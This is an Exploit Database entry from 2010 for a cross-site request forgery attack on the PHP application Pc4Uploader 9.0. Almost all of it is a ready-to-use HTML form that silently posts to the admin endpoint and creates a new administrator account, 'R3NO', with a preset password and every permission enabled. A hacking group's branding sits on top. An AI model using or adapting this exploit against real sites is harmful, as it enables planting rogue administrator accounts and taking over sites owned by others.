Pc4Uploader 9.0 - Cross-Site Request Forgery

EDB-ID:

14819

CVE:

N/A


Author:

RENO

Type:

webapps


Platform:

PHP

Date:

2010-08-27


# Exploit Title: pc4uploader [XSRF] Add Admin Exploit# Date: 27-08-2010# Author: RENO
# TeaM : SauDi ViRuS TeaM
# SiTe: WwW.Sa-ViRuS.CoM
# Software Link: http://www.pc4arb.com/product-10.html

<html>
<title>[SvT]</title>
<body bgcolor="#000000" style="background-attachment: fixed" background="http://www.sa-virus.com/reno/bg.gif">
<p
 align="left"><font size="5" 
color="#FFFFFF"><b>                                
 
               
</b></font><b><font color="#FFFFFF" size="5">Pc4Uploader - [XSRF ] Add Admin 
Exploit<br>
                                                                  
    
Author : RENO<br>
                                                         
     TeaM : SauDi ViRuS TeaM<br>
                                                           
    
Site : <a href="http://WwW.Sa-ViRuS.CoM">WwW.Sa-ViRuS.CoM</a><br>
                                                       
      
Email : R7e@HoTMaiL.coM</font></b></p>
<p align="center"> </p>
<p align="center"> </p>

<svt>
<center>

<form method="POST" name="form" action="http://localhost/path/admin/index.php?mod=account&add=saveadmin">
<input type="hidden" name="username" value="R3NO"/>
<input type="hidden" name="password" value="SauDi_ViRuS_TeaM"/>
<input type="hidden" name="email" value="R7e@HoTMaiL.CoM"/>
<input type="hidden" name="setting_rols" value="1"/>
<input type="hidden" name="member_rols" value="1"/>
<input type="hidden" name="files_rols" value="1"/>
<input type="hidden" name="msg_rols" value="1"/>
<input type="hidden" name="news_rols" value="1"/>
<input type="hidden" name="advs_rols" value="1"/>
<input type="hidden" name="links_rols" value="1"/>
<input type="hidden" name="support_rols" value="1"/>
<input type=submit value="Submit">
</p>

</form>
</svt>


</center>
</html>